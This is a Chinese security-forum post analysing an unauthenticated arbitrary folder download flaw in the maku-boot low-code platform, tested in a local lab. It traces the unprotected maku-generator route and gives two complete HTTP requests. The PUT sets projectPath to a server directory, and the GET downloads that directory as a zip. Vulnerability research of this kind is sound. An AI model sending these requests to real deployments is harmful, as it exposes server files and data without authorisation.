问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
maku-boot未授权任意文件下载漏洞分析
通过分析系统路由找到未授权路径,针对目标路径找到文件下载漏洞并展开攻击。
一、项目信息 ====== maku-boot 是采用SpringBoot3.4、SpringSecurity6.4、Mybatis-Plus、Vue3、Element-plus等技术开发的低代码开发平台,旨在为开发者提供一个简洁、高效、可扩展的低代码开发平台。 gitee: <https://gitee.com/makunet/maku-boot> 开发文档:[https://maku.net/docs/maku-boot](https://gitee.com/link?target=https%3A%2F%2Fmaku.net%2Fdocs%2Fmaku-boot) 二、环境搭建 ====== 修改配置文件信息 maku-server/src/main/resources/application-dev.yml  导入数据库   项目打包,运行即可  三、漏洞分析 ====== 1、未授权分析 ------- 系统默认忽略对maku-generator地址的权限校验,maku-generator其实是maku官方自行开发的一个组件,该组件自身也不带鉴权功能。 参考: <https://gitee.com/makunet/maku-generator> net/maku/framework/security/config/SecurityFilterConfig.java:37    2、文件下载分析 -------- 文件下载时根据id号获取文件夹路径并下载,注意:是文件夹,最终得到的是整个文件夹的zip压缩包。 net/maku/generator/controller/ProjectModifyController.java:72   这里的exclusions在保存时直接留空可以避免很多麻烦,后面就是正常的文件读取逻辑。  3、项目更新接口 -------- 使用PUT方式时会进入更新接口  其参数包含项目路径  4、漏洞验证 ------ 更新项目信息,projectPath为要读取的文件夹  完整请求 ```text PUT /maku-generator/gen/project HTTP/1.1 Host: 192.168.64.130:8089 Content-Length: 302 Accept: application/json, text/plain, \*/\* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://test.com:8089 Referer: http://test.com:8089/maku-generator/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close {"id":1,"projectName":"maku-boot","projectCode":"maku","projectPackage":"net.maku","projectPath":"/root/web/logs","modifyProjectName":"baba-boot","modifyProjectCode":"baba","modifyProjectPackage":"com.baba","exclusions":"","modifySuffix":"java,xml,yml,txt","createTime":"2024-06-18T23:26:33.000+08:00"} ``` 调用下载接口,可以读取到目标文件  完整请求 ```text GET /maku-generator/gen/project/download/1 HTTP/1.1 Host: 192.168.64.130:8089 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://test.com:8089/maku-generator/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ``` 也可以浏览器直接访问目标地址获取压缩包 <http://192.168.64.130:8089/maku-generator/gen/project/download/1>  
发表于 2025-08-12 09:42:41
阅读 ( 498 )
分类:
漏洞分析
0 推荐
收藏
0 条评论
请先
登录
后评论
fibuleX
3 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!